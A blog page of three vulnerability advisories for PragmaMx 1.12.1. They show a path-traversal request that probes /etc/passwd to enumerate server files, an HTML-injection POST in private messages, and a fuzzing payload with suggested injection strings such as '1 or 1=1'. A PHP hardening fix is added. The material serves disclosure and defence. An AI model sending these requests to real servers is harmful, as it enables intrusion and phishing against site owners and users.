Sunday, 18 March 2012
[EN] PragmaMX 1.12.1 - remote file enumeration
# TITLE ....... # PragmaMx 1.12.1 remote file enumeration ......................................... #
# DATE ........ # 15.03.2012 ...................................................................... #
# AUTHOR ...... # http://hauntit.blogspot.com ..................................................... #
# SOFT LINK ... # http://pragmamx.org ............................................................. #
# VERSION ..... # 1.12.1 .......................................................................... #
# TESTED ON ... # LAMP ............................................................................ #
# ................................................................................................. #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#..........................................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)
#..........................................................#
# 2. What is the type of vulnerability?
This is a "remote file enumeration" bug.
After some fuzzing tests I found nice behavior in the new PragmaMX.
The "correct functionality" is that the z parameter carries an image filename.
I did something else: I pointed 'filename' at 'another file in the file system',
for example /etc/passwd.
#..........................................................#
# 3. Where is bug :)
The vulnerable parameter is "z".
If we send a GET like this:
http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&width=295&height=420
our response should look like:
...cut.from.Burp...
(...)
<head>
<title>/etc/passwd</title>
</head>
<body style="margin: 0; padding: 0;">
<img src="../../../../../../../../../../../../etc/passwd" width="295" height="420" alt="/etc/passwd" /> </body>
</html>
...cut.from.Burp...
This will be the answer "if the remote file is there". By "there" I mean the location of the file you point to.
If the file you chose isn't there, the answer will be something like:
(GET:
http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswdlalala.txt&width=295&height=420
)
...cut.from.Burp...
<head>
<title></title>
</head>
<body style="margin: 0; padding: 0;">
<img src="../../../../../../../../../../../../etc/passwdlalala.txt" width="295" height="420" alt="" /> </body>
</html>
...cut.from.Burp...
So the difference is in the "alt" attribute (and the title) of the answer.
If on the remote server we can 'find a file x', then the name 'x' will be presented in the HTTP response.
If the file (x) can not be found at the remote location, then the output (alt attribute) should be blank.
This vulnerability can be used to:
a) check for some other LFI/RFI-based attacks
b) write a bruteforcer to determine OS/PHP version, get paths of configs, etc...
And here is the relevant source line:
./modules/My_eGallery/image.php:19:$img = (isset($_GET['z']) && is_string($_GET['z'])) ? $_GET['z'] : '';
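The grep line above shows the raw z parameter being taken straight from $_GET. What a fix for this kind of existence oracle looks like, as an added example written for this post (not PragmaMx's own code; the gallery directory name and the uniform 404 response are assumptions):

```php
<?php
// Hardened stand-in for the image.php handler: the "z" value may only name a
// plain image file inside the gallery directory, and every invalid or missing
// input gets the same answer, so the response no longer reveals whether an
// arbitrary path on the server exists.
define('GALLERY_DIR', __DIR__ . '/gallery');   // assumed layout

function resolve_gallery_image(string $z): ?string
{
    // Reject empty names and NUL bytes before touching the filesystem.
    if ($z === '' || strpos($z, "\0") !== false) {
        return null;
    }
    // Plain file name only: no slashes, no "..", and an expected extension.
    if (!preg_match('/^[A-Za-z0-9_.-]+\.(jpe?g|png|gif)$/i', $z)) {
        return null;
    }
    $base = realpath(GALLERY_DIR);
    $full = realpath(GALLERY_DIR . '/' . $z);
    // realpath() is false for missing files; also confirm the resolved path is
    // still under the gallery, which covers symlinks as well as traversal.
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $z;
}

$raw = $_GET['z'] ?? '';
$img = is_string($raw) ? resolve_gallery_image($raw) : null;
$w   = (int)($_GET['width'] ?? 0);
$h   = (int)($_GET['height'] ?? 0);

if ($img === null) {
    // One uniform answer for traversal, bad names and missing files alike.
    http_response_code(404);
    exit('Image not found');
}

// Escape on output so the name can never inject markup into title/alt/src.
$safe = htmlspecialchars($img, ENT_QUOTES, 'UTF-8');
echo "<html><head><title>$safe</title></head>\n";
echo "<body style=\"margin: 0; padding: 0;\">";
echo "<img src=\"gallery/$safe\" width=\"$w\" height=\"$h\" alt=\"$safe\" />";
echo "</body></html>\n";
```

Requests like the two shown above (z=..%2f..%2f...%2fetc%2fpasswd and the nonexistent passwdlalala.txt) both get the identical 404, which is the property a defender should verify after patching.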
#..........................................................#
# 4. More...
- http://www.pragmamx.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#..........................................................#
# 5. Mail me, I'm still looking for new projects... ;)
#............................................#
# Best regards
#
[EN] PragmaMX 1.12.1 - simple "html injection"
# TITLE ....... # PragmaMx 1.12.1 Basic HTML Injection (for users logged-in) ............ #
# DATE ........ # 17.03.2012 ............................................................ #
# AUTHOR ...... # http://hauntit.blogspot.com ........................................... #
# SOFT LINK ... # http://www.pragmamx.org ............................................... #
# VERSION ..... # 1.12.1 ................................................................ #
# TESTED ON ... # LAMP .................................................................. #
# ....................................................................................... #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
I called it 'basic html injection' because we can send 'HTML' via this form (as a logged-in user).
We can not send 'all HTML tags', only those defined in the web application.
To find out how we could do XSS or phishing, we could try to 'bruteforce' all HTML tags
(in this scenario the tags should be similar to the tags we (users) can add in posts).
#............................................#
# 3. Where is bug :)
...cut from Burp...
POST /www/pragmamx.1.12.1/html/modules.php?name=Private_Messages HTTP/1.1
Host: localhost
(...)
subject=aaaaa&message=aaaaaaaaaaaaaaaaa&name=Private_Messages&file=buddy&to_userid=3&op=send&to=test;)<br>test;)<br>test;)<br>test;)<br>&x=59&y=22
...cut from Burp...
#............................................#
# 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#............................................#
# Best regards
#
[EN] PragmaMx 1.12.1 - 'bomb' for logged-in users (in Private_Messages)
In the latest PragmaMX I found interesting behavior. Described below:
# TITLE ....... # PragmaMx 1.12.1 - 'bomb' for logged-in users (in Private_Messages) ........ #
# DATE ........ # 18.03.2012 ................................................................................... #
# AUTHOR ...... # http://hauntit.blogspot.com .................................................................. #
# SOFT LINK ... # http://www.pragmamx.org ...................................................................... #
# VERSION ..... # 1.12.1 ....................................................................................... #
# TESTED ON ... # LAMP ......................................................................................... #
# .............................................................................................................. #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
When I was fuzzing this application I found a very interesting thing.
Look at the traffic from Burp at (3).
#............................................#
# 3. Where is bug :)
...cut from Burp...
POST /www/lastz/pragmamx.1.12.1/html/modules.php?name=Private_Messages HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Referer: http://localhost/www/lastz/pragmamx.1.12.1/html/modules.php?name=Private_Messages&file=buddy&op=compose&to=tester
Cookie: mxlalala=lalala; tab_ya_edituser=1; PHPSESSID=PHPSESSID
Content-Type: application/x-www-form-urlencoded
Content-Length: 177
Connection: close
subject=aaaaa&message=aaaaaaaaaaaaaaaaa&name=Private_Messages&file=buddy&to_userid=-999999999999999&op=-999999999999999&to=-999999999999999&x=-999999999999999&y=-999999999999999
...cut from Burp...
What I saw at this stage you can check at my blog (4).
The description should be: after I built this payload (-999...) and sent it to PragmaMx via Burp,
the response status was 200 (OK). So I copied the URL string and 'sent it to the browser'.
The page started to create new windows in messages (from other fuzzing tests).
'-999...' is not the 'only payload' that shows this.
You can try many more, like: 23 or 1, 1 or 1=1, phpinfo(), etc.
Try it ;)
#............................................#
# 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#............................................#
# Best regards
#